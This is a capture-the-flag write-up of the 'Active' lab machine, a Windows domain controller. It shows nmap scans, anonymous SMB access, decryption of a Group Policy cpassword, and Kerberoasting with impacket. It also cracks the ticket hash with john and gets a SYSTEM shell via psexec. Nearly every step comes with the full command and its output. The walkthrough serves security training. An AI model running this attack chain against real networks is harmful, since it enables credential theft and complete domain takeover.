Active

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.100 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Fri Jun 17 14:00:41 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.061s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49168/tcp open  unknown
49169/tcp open  unknown

# Nmap done at Fri Jun 17 14:01:09 2022 -- 1 IP address (1 host up) scanned in 28.29 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49168,49169 10.10.10.100 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Fri Jun 17 14:04:24 2022 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49168,49169 -oN targeted 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.054s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-17 12:04:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-06-17T12:05:28
|_  start_date: 2022-06-17T11:04:54
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 17 14:05:38 2022 -- 1 IP address (1 host up) scanned in 73.62 seconds

First, let's add the domain active.htb to the /etc/hosts file.

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.100    active.htb

Let's try to list the SMB shares.

smbclient -L 10.10.10.100 -N

  • -L get a list of shares available on the host.

  • -N makes use of a null session, don't ask for password.

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Exploitation

We could see what's inside the Replication share. Inside it, we'll see the active.htb directory.

smbclient \\\\10.10.10.100\\Replication -N

  • -N makes use of a null session, don't ask for password.

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

                5217023 blocks of size 4096. 284357 blocks available

Inside this share, you'll find the \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml file.

get Groups.xml

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)

This file contains a user, and an encrypted password.

cat Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The cpassword key contains an encrypted password which can be decrypted with the gpg-decrypt tool.

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

GPPstillStandingStrong2k18

Now we could test these credentials with crackmapexec.

crackmapexec smb 10.10.10.100 -u "SVC_TGS" -p "GPPstillStandingStrong2k18"

  • -u username.

  • -p password.

SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Privilege Escalation

And those credentials are valid. At this point, we could try to do a Kerberoasting attack. Let's try to do it with the impacket tool called GetUserSPNs.

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

  • -request requests TGS for users and output them.

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2022-06-17 22:43:42.386142             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$273c8852f5c2beda983d2f85ef9893d3$10f0154f69287c6ee30801ac7e2ece7cff61176c809ce0c2ab855a28d3d731b7edcd2943d996bb477caaf2c21162a2935210a9e83194e24a8cf43830c35c6e1d4ed1160575d1cd0dd9534010a2ca0a45e087ce946076f0ce34e5fe58523d58b11fe3b626b5a68d821262061c5834d77159006a4a56757f98fccb7917ba16c5bba03ab9a1078ddb276d9dfee2ac41baa6d78e35d170b28f42e70ab90541b5cc9c0fd28991cd0a73a8523f925f77230616011ffec19b3898ff8ef292735ab008df2815e56e36fd2d68ea003022b01e16e5e384c44e6ffe44206161bc454cd1fa7564983f8ed246b7966dc419e86a896344caaa2b5a6d17ebf20e28705bb200a49cdffd40bc831294bf1d9d0d5234f32b963ecc6676bf4387a96c6fcdae41b3d3a88482e0ad98e55c5c2c81c8d00db5f6d81d231bf02d5bd172081377516eafa0c311d73d854d6eb47fd5c5623206967f703543afa70555f1a7cefbe255cf9c5f7f50f3e94b0ba7de1422325df9db9d29f1fca901523404d23dfb15ef0d120d088cab935141e965c29bfa61997a5f4702af1f4a83917a3ab1ae510f89fd42f845f1ec15a909ae86158ef2c5eedc10aa48981835c536c91902212104642ece0c6c7cbaeb102a5560d912596b47e9fc05553ec5be573fe6bcd82c92f4a6558c77e06b09f04ed6d2e38a5f322c1f6f8729021b02019ab976aba6e35c53cba70d8df717c4c8102a6b81e9e82dbdb9985859d85866ed0f14562b31ef2b44fe9178b577517d426e2be52931c714eaf702a09bf0150efca68991c0ba116e06b1cca6e95944d0e355e9e117485ff844311872f9d6d5b00f613b4ed352198c12dca64e81041d902b874410caf074a2114abbb1b60cd79f914381b01e8aa73e8630d3f0d73be32b7f37ef62722f83bf1347865b0063048bc6768f217d2fca9a8d340c111235beda2a2aa81adb211f85577c7b0270ca911a0a1fbc4cde06ed74349a2c8c2dd577dad346e8b320a6dec7150137dc76f2f9b30ce0dc456424792722d90efc9653702d11124d36340583923c78ec3b6ce8dd821bdc3e8e4ccfcadff19dc8c22db0204d82a7ed6044bc64bb4a3e4ce620302179e7d03eea72ab97fd33ac5748fb6f36343847a6d5c1126b36fa0c312f6a6021e7d07d263b21a4d497f31e0e51144d52d4cfbd049b250c6632d6b39944d640ce0b3becff7e15fbd258ca70e660e082375b41392d62b2d66d9866b91c7eb0f231e33e7d8d3a666dfac212

Now, let's put that TGS of the Administrator user on a file called hash, and break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:01:17 DONE (2022-06-17 23:33) 0.01293g/s 136354p/s 136354c/s 136354C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And we get the Ticketmaster1968 password for the administrator user. Now, all we have to do is get a shell with the psexec tool, and reap the harvest and take both the user and root flags.

impacket-psexec active.htb/administrator:Ticketmaster1968@10.10.10.100

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file RDplSnin.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service tAJu on 10.10.10.100.....
[*] Starting service tAJu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\SVC_TGS\desktop\user.txt
91ff89ca32631212e8a2e6ad27b1b961

C:\Windows\system32> type \users\administrator\desktop\root.txt
d8cb0dfdd2cbbc3d8125ec3b56a158c3

Last updated

Was this helpful?